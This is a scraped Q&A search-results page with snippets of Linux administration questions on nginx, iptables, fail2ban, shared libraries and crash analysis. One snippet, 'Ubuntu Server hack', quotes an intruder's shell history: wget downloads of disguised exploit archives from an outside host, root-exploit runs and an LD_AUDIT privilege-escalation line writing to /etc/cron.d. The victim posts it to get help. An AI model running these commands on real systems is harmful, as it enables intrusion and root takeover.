Search Results

Search found 25551 results on 1023 pages for 'linux validated rpm oracl'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 386/1023 | < Previous Page | 382 383 384 385 386 387 388 389 390 391 392 393  | Next Page >

  • Restrict a port to a single app

    - by viraptor
    I'd like to restrict a range of udp ports to a single application (or a user). What I'd like to achieve is not simply blocking a bind() from other uids, but also remove the range from a pool that can be auto-assigned. For example, if someone tries to explicitly bind 12345, but doesn't run the specified app, they should get EPERM. If someone tries to bind an unspecified port, they should never try to bind 12345 at random. Is there any system that can help here? I tried browsing apparmor / selinux docs, but they seem to do the blocking part only.

    Read the article

  • How do you apply development practices like version control, testing and continuous integration/deployment to system administration?

    - by arex1337
    Imagine you're going to manage a number of servers with a number of different services that's used by a number of people. Now say you want to reconfigure or replace some software on one of those servers. Obviously you don't want to work on servers that are in production. If this was a code change, as a developer, I would make the change on my local development machine, test it locally and commit the change to a version control system. The changes could then be deployed in a staging environment, tested further and finally deployed in a production environment. It would also be easy for me to roll back, if necessary. Generally, or specifically, how do you achieve this in system administration? (The first thing that comes to mind is to use virtual machines and put virtual machine images in version control, but I'm sure there is a lot of literature and clever solutions I'm not presently aware of.)

    Read the article

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • Error while loading shared libraries - libwebsock

    - by kittyPL
    Im trying to setup libwebsock, simple C websocket library. I followed the installation procedure from INSTALL file, everything went fine. Im able to compile test program given in the examples. But when I want to run my executable, wild error appears: ./echo: error while loading shared libraries: libwebsock.so.1: cannot open shared object file: No such file or directory I checked /usr/local/lib twice, libwebsock.so.1 exists and is doing very well. I also tried copying the lib to the echo folder (so its placed next to binary), still same error. It's quite funny for me: shadowz@Ubu:~/WebSocket$ ls echo echo.c echo.cpp libwebsock.so.1 shadowz@Ubu:~/WebSocket$ ./echo ./echo: error while loading shared libraries: libwebsock.so.1: cannot open shared object file: No such file or directory Any suggestions? Im running out of ideas...

    Read the article

  • Enable gzip on Nginx

    - by Rob Wilkerson
    Yes, I know that there are a lot of other questions that seem exactly like this out there. I think I must've looked all of them. Twice. In desparation, I'm adding another in case my specific configuration is the issue. Bear with me. First, the question: What do I need to do to get gzip compression to work? I have an Ubuntu 12.04 server installed running nginx 1.1.19. Nginx was installed with the following packages: nginx nginx-common nginx-full The http block of my nginx.conf looks like this: http { include /etc/nginx/mime.types; access_log /var/log/nginx/access.log; sendfile on; keepalive_timeout 65; tcp_nodelay on; gzip on; gzip_disable "msie6"; include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; } Both PageSpeed and YSlow are reporting that I need to enable compression. I can see that the request headers indicate Accept-Encoding:gzip,deflate,sdch, but the response headers do not have the corollary Content-Encoding header. I've tried various other config values (gzip_vary on, gzip_http_version 1.0, etc.), but no joy. As far as I know, I can only assume that nginx was compiled with compression support, but if there's any way to verify that, I'd love to know. If anyone sees anything I'm missing or can suggest further debugging, please let me know. I'm no sysadmin and I'm new to Nginx so I've exhausted everything I can think of or have read. Thanks.

    Read the article

  • Running Ubuntu with multiple monitors having a panel each

    - by Andreas Grech
    I have just installed Ubuntu and I'm trying to set up a correct configuration for having multiple monitors. I want the two monitors to have their own workspaces, yet the ability to drag a window from one monitor to the next. I also want a separate panel (taskbar) for each monitor. I have played around with nvidia-settings and tried the following different configs: Having both monitors `Use separate X screen" A panel for each monitor but I couldn't drag windows from one monitor to the next Using TwinView The ability to drag windows from one monitor to the next but only a single panel for the primary display Now I want to have the above configurations combined. Basically, as I stated beforehand, having a separate panel for each monitor and also the ability to drag windows across monitors. Can anyone provide me with suggestions please?

    Read the article

  • Proper upstart script for hamachi?

    - by ALQ
    I've been looking for a script to supervise hamachi and mostly got it to work except for the part that daemonizes hamachid. The following script works but is not perfect. I'm not familiar with upstart internals to debug this further. description "Hamachi VPN" author "Alexis Le-Quoc <[email protected]>" start on (net-device-up and local-filesystems and runlevel [2345]) stop on runlevel [016] respawn oom never env DAEMON=/opt/logmein-hamachi/bin/hamachid pre-start script [ -x "$DAEMON" ] end script # should really be: # expect daemon # exec $DAEMON exec $DAEMON debug > /dev/null

    Read the article

  • How do I format this regex so it will work in fail2ban?

    - by chapkom
    I've just installed fail2ban on my CentOS server in response to an SSH brute force attempt. The default regular expressions in fail2ban's sshd.conf file do not match any entries in audit.log, which is where SSH seems to be logging all connection attempts, so I am trying to add an expression that will match. The string I am trying to match is as follows: type=USER_LOGIN msg=audit(1333630430.185:503332): user pid=30230 uid=0 auid=500 subj=user_u:system_r:unconfined_t:s0-s0:c0.c1023 msg='acct="root": exe="/usr /sbin/sshd" (hostname=?, addr=<HOST IP>, terminal=sshd res=failed)' The regular expression I am attempting to use is: ^.*addr=<HOST>, terminal=sshd res=failed.*$ I've used regextester.com and regexr to try to build the regex. The testers give me a match for this regex:^.*addr=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}, terminal=sshd res=failed.*$ but fail2ban-regex complains if I don't use the <HOST> tag in the regex. However, using ^.*addr=<HOST>, terminal=sshd res=failed.*$ gives me 0 matches. At this point, I am totally stuck and I would greatly appreciate any assistance. What am I doing wrong in the regex I am trying to use?

    Read the article

  • What can cause peaks in pagetables in /proc/meminfo ?

    - by Fuzzy76
    I have a gameserver running Debian Lenny on a VPS host. Even when experiencing a fairly low load, the players start experiencing major lag (ping times rise from 50 ms to 150-500 ms) in bursts of 3 - 10 seconds. I have installed Munin server monitoring, but when looking at the graphs it looks like the server has plenty of CPU, RAM and bandwidth available. The only weird thing I noticed is some peaks in the memory graph attributed to "page_tables" which maps to PageTables in /proc/meminfo but I can't find any good information on what this might mean. Any ideas what might be causing this? If you need any more graps, just let me know. The interrupts/second count is at roughly 400-600 during this period (nearly all from eth0). The drop in committed was caused by me trying to lower the allocated memory for the server from 512MB to 256MB, but that didn't seem to help.

    Read the article

  • Recommended way to restrict Apache users

    - by Dor
    Following on why should we restrict Apache users, another two questions arises: What is the recommended method of restricting the places Apache users can traverse & read in the file system? What to do against fork bombs and other shell scripting problems? (bash scripting is allowed) My possible solutions (I prefer to know which solution you choose and why): chroot OR mod_chroot disable bash OR use Restricted BASH Please offer another solutions if you find appropriate. (perhaps selinux is?) Current status: Users are allowed to executed bash scripts (via PHP for example) suexec is active Apache requested are served with FastCGI for PHP

    Read the article

  • Ubuntu 12.04 crash analysis - strange binary data on all open files at the moment of crash

    - by lanbo
    A couple of hours ago we got a system crash on Ubuntu 12.04. We checked all the log files and there is nothing suspicious to blame to. Last stuff that was logged was some dovecot activity. There are no kernel panic messages. Nothing. It is a new server (new hardware) we are testing before production. And because it is new hard, I'm suspicious the problem may be due to some faulty hardware. We already run memtester with no problem detected. I'll be happy to hear from other hardware testing tools (the machine has SSD). Anyway, the thing I wanted to ask you is a different one. The strange thing is on every open file at the moment of the crash we found the next sequence of symbols was written into them: "@^@^@^@^@^@^@...". For example, on the syslog log file we got: Apr 16 15:53:56 odyssey dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<info>, method=PLAIN, rip=46.29.255.73, lip=5.9.58.177 ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^ [these continues for about 1000 chars...] ^@^@^@^@Apr 16 15:55:12 odyssey kernel: imklog 5.8.6, log source = /proc/kmsg started. We got all these symbols in all open files. These include: syslog, mail.log, kern.log, ... But also on some logs that are output by php scripts run in CRONs from user accounts (not root). So, any idea why all open files got these characters written during the crash? This is pretty bad since the crash corrupted many files (we don't even know which other ones may be affected). We are suspicious that all open files (in write mode maybe) at the moment of the crash got all these symbols inserted. Why is that? BTW [in case it helps], the system automatically rebooted after the crash but Apache did not start. There were not traces in /var/apache2/*log why apache did not start. After running a "service apache2 start" it started with no problems. Also, we rebooted the machine manually and Apache also started on reboot. But it did not start after the crash and no errors were reported. Thanks guys!

    Read the article

  • iptables to block non-VPN-traffic if not through tun0

    - by dacrow
    I have a dedicated Webserver running Debian 6 and some Apache, Tomcat, Asterisk and Mail-stuff. Now we needed to add VPN support for a special program. We installed OpenVPN and registered with a VPN provider. The connection works well and we have a virtual tun0 interface for tunneling. To archive the goal for only tunneling a single program through VPN, we start the program with sudo -u username -g groupname command and added a iptables rule to mark all traffic coming from groupname iptables -t mangle -A OUTPUT -m owner --gid-owner groupname -j MARK --set-mark 42 Afterwards we tell iptables to to some SNAT and tell ip route to use special routing table for marked traffic packets. Problem: if the VPN failes, there is a chance that the special to-be-tunneled program communicates over the normal eth0 interface. Desired solution: All marked traffic should not be allowed to go directly through eth0, it has to go through tun0 first. I tried the following commands which didn't work: iptables -A OUTPUT -m owner --gid-owner groupname ! -o tun0 -j REJECT iptables -A OUTPUT -m owner --gid-owner groupname -o eth0 -j REJECT It might be the problem, that the above iptable-rules didn't work due to the fact, that the packets are first marked, then put into tun0 and then transmitted by eth0 while they are still marked.. I don't know how to de-mark them after in tun0 or to tell iptables, that all marked packet may pass eth0, if they where in tun0 before or if they going to the gateway of my VPN provider. Does someone has any idea to a solution? Some config infos: iptables -nL -v --line-numbers -t mangle Chain OUTPUT (policy ACCEPT 11M packets, 9798M bytes) num pkts bytes target prot opt in out source destination 1 591K 50M MARK all -- * * 0.0.0.0/0 0.0.0.0/0 owner GID match 1005 MARK set 0x2a 2 82812 6938K CONNMARK all -- * * 0.0.0.0/0 0.0.0.0/0 owner GID match 1005 CONNMARK save iptables -nL -v --line-numbers -t nat Chain POSTROUTING (policy ACCEPT 393 packets, 23908 bytes) num pkts bytes target prot opt in out source destination 1 15 1052 SNAT all -- * tun0 0.0.0.0/0 0.0.0.0/0 mark match 0x2a to:VPN_IP ip rule add from all fwmark 42 lookup 42 ip route show table 42 default via VPN_IP dev tun0

    Read the article

  • Should I split my website into different servers

    - by Nyxynyx
    I have a website where a user uploads photos, the photos gets resized and thumbnailed, and stored on the server. At the same time, there are some INSERTS into a MySQL table regarding the photo uploaded (like description, user id etc). The site currently runs off a managed VPS, and I love the support it provides. However it is expensive to store the many small photos and the resizing and thumbnailing processes do cause spikes on the app performance. (Amazon S3 is pretty expensive, especially considering the costs for uploading many small files) Question: Will it be a good idea to move the image processing operations and image storage to another server which is an unmanaged dedicated server with a much lower cost/gb and keep the current VPS for its 24/7 support and hosting the webapp? Or should I move the entire site to the dedicated server? VPS Specs 16 cores 2.4GHz (E5620) 1GB memory 60GB Storage 3.5TB transfer $43/mth Managed (24/7) Dedicated Specs i3 2130 2 cores 3.4+ GHz 16 GB DDR3 2 x 1TB SATA2 storage 15 TB transfer $79/mth Unmanaged (Weekdays support) Software used Apache PHP MySQL Solr PostgreSQL ImageMagick

    Read the article

  • what does the @ symbol mean in ls -l directory listing?

    - by Andrew Arrow
    When I run ls -l on my mac I see two .yml files: -rw-r--r-- 1 aa staff 6 Apr 15 05:50 s1.yml -rw-r--r--@ 1 aa staff 362 Apr 15 05:49 s3.yml same owner, same permissions but one has a @ at the end of the permisions. The one with the @ shows up in my editor, the one without does not. So there must be some significance. How can I turn on the @ for the file without it? I selected the files in the finder and did get info and everything looks identical between the two files.

    Read the article

  • Monitor Bonded Interface for Disconnection

    - by bradlis7
    I am trying to monitor for network failures on a machine, and one portion of that is to monitor interfaces that are intended to be active also be "RUNNING". An Ethernet port, such as eth0, will say "RUNNING" if it is physically connected to another device. The problem lies in the bonded interfaces, such as bond0. If all of the ethernet devices are disconnected, it still says that it is running, and it is still pingable. Is this by design, or is my system setup incorrectly? Does the miimon option have something to do with this?

    Read the article

  • Force gdm login screen to the primary monitor

    - by JIa3ep
    I have two monitors attached to my video card. Primary monitor has a resolution equal to 1280x1024 and second has 1920x1200. My gdm login screen always appears on the second monitor even if it is switched off. My question is how to force gdm to show login screen always on primary monitor with resolution 1280x1024? I use Ubuntu 10.04.

    Read the article

  • Tab Completion In Emacs shell-mode SSH Sessions

    - by Sean M
    My current use pattern of emacs results in my having several shell-mode buffers open, each running an ssh session. I am running into an issue with this, though - when I try to tab-complete file names and other things in my remote session, the shell attempts to use completions available on the local machine instead of on the remote machine. For example, if the file ~/foobar exists on the local machine and ~/frob exists on the remote machine, typing in ~/f and pressing tab results in ~/foobar instead of completing correctly. If I use ssh outside of emacs and try the same thing, I get the correct completion of ~/frob instead. How can I get tab-completion to complete the way it does in normal ssh sessions ?

    Read the article

  • Image Magick and Ghostscript

    - by user114671
    I mainly do web design but I host a few client sites on a Centos 5 VPS. A new client has asked me to host their site and I've been given the following configuration requirement: Apache 2.2.3 PHP 5.2.17 MySQL 5.0.77 Image Magick 6.5.1-0 (not as an Apache module) Ghostscript 8.7 Checking php_info() I have: Apache 2.2.3 PHP 5.2.14 MySQL 5.0.90 I don't have IM or GS listed. I expect that my versions of PHP and MySQL are similar enough to work, but how do I get my server set up to work with this client's site as well?

    Read the article

  • Mounting both /dev/sda and /dev/sda1 - how can this be?

    - by itsadok
    I work on an Amazon EC2 instance that somebody else set up. We have an EBS volume mounted on /dev/sda, even though the root device is already on /dev/sda1, and we're also using `/dev/sda2' user@server:~$ mount /dev/sda1 on / type ext3 (rw) ... (snip) /dev/sda2 on /mnt type ext3 (rw) /dev/sda on /vol type xfs (rw,noatime) ... This doesn't seem to fit with what I know about the way /dev/ works. How is this possible, and more importantly: will this cause trouble in the future? I'm running ubuntu 9.04 jaunty.

    Read the article

  • Create kickstart configuration file from existing configuration.

    - by ÜMineiro
    Is there a script or another way to automatically generate a kickstart configuration file from the system state of an existing server so that the file can be use to replicate (not clone) the configuration of the system in another install? I know that the anaconda-ks.cfg file is stored on the /root dir. but the system in question have been extensively changed since it's installation, and the file is of no use now.

    Read the article

  • Mail server Backup script

    - by Paul Stevens
    Hello, Im looking for the best way to accomplish a full backup of our "vmail" accounts on our mail server (CentOS "iRedMail" 5.1). I also need to split on 4GB parts the resulting tar or bzip compressed backup, and get this DVD-RW burned, on same server. The idea is to get this procedure to running overnight, once a week. Our mail server holds about 45GB of information. I will appreciate any advise or help on this topic. Thanks.

    Read the article

  • Extract specific files in a tar archive using a wildcard

    - by AdrieanKhisbe
    I'm tring for a script to extract only jpeg pictures from an archive containing maky kind of files. To do so I tried first to use: tar -xf MyTar.tar *.jpg but it failed (*.jpg not found) and suggest me to use "--wildcard". So I tried tar -xf MyTar.tar --wildcard *.jpg I did that, but then the same error and a different warning saying yo me that the option "--wildcard" is ambigious. I've been over the manuel pages for tar, but didn't find a clue about the problem thanks

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 382 383 384 385 386 387 388 389 390 391 392 393  | Next Page >